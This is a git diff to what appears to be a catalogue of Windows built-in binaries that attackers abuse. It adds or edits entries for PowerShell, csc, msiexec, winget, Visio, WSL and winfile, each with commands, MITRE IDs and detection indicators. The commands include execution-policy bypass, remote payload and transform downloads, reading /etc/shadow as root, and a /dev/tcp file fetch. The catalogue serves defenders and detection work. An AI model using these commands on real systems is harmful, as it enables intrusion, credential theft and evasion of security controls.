diff --git a/yml/HonorableMentions/PowerShell.yml b/yml/HonorableMentions/PowerShell.yml new file mode 100644 index 0000000..dfc3048 --- /dev/null +++ b/yml/HonorableMentions/PowerShell.yml @@ -0,0 +1,38 @@ +--- +Name: Powershell.exe +Description: Powershell.exe is a a task-based command-line shell built on .NET. +Author: 'Everyone' +Created: 2024-04-03 +Commands: + - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 + Description: Set the execution policy to bypass and execute a PowerShell script without warning + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." + Description: Set the execution policy to bypass and execute a PowerShell command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== + Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up +Full_Path: + - Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe' + - Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell +Resources: + - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 + - Link: https://attack.mitre.org/techniques/T1059/001/ +Acknowledgement: + - Person: Everyone + Handle: '@alltheoffensivecyberers' diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 945b584..6b8517c 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,18 +1,18 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET Framework to compile C# code Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + - Command: csc.exe -out:Output.exe File.cs + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -30,7 +30,4 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe -Acknowledgement: - - Person: - Handle: + - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/ diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 2e69f24..35a97e4 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" - Description: Calls DLLRegisterServer to register the target DLL. + Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -28,7 +28,7 @@ Commands: Tags: - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" - Description: Calls DLLUnregisterServer to un-register the target DLL. + Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -37,12 +37,12 @@ Commands: Tags: - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. - Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server + Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. + Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index cd2588d..d2629de 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -8,7 +8,7 @@ Commands: Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' Usecase: Download and execute an arbitrary file from the internet Category: Execute - Privileges: Local Aministrator - required to enabled local manifest setting + Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml new file mode 100644 index 0000000..2c141e5 --- /dev/null +++ b/yml/OtherMSBinaries/Visio.yml @@ -0,0 +1,34 @@ +--- +Name: Visio.exe +Description: Microsoft Visio Executable +Author: Avihay Eldad +Created: 2024-02-15 +Commands: + - Command: Visio.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe +Detection: + - IOC: URL on a visio.exe command line + - IOC: visio.exe making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1a5bda..e1493d1 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -10,35 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --exec bash -c 'cat file' - Description: Cats /etc/shadow file as root + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + - Command: wsl.exe --exec bash -c "" + Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --system calc.exe - Description: Execute the command as root - Usecase: Performs execution of arbitrary Linux commands as root without need for password. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 11 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + MitreID: T1105 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -59,3 +52,4 @@ Acknowledgement: Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' + - Person: Konrad 'unrooted' Klawikowski diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml new file mode 100644 index 0000000..f0171ed --- /dev/null +++ b/yml/OtherMSBinaries/winfile.yml @@ -0,0 +1,24 @@ +--- +Name: winfile.exe +Description: Windows File Manager executable +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: winfile.exe calc.exe + Description: Execute an executable file with WinFile as a parent process. + Usecase: Performs execution of specified file, can be used as a defense evasion + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\winfile.exe + - Path: C:\Windows\winfile.exe + - Path: C:\Program Files\WinFile\winfile.exe + - Path: C:\Program Files (x86)\WinFile\winfile.exe + - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe +Resources: + - Link: https://github.com/microsoft/winfile +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad'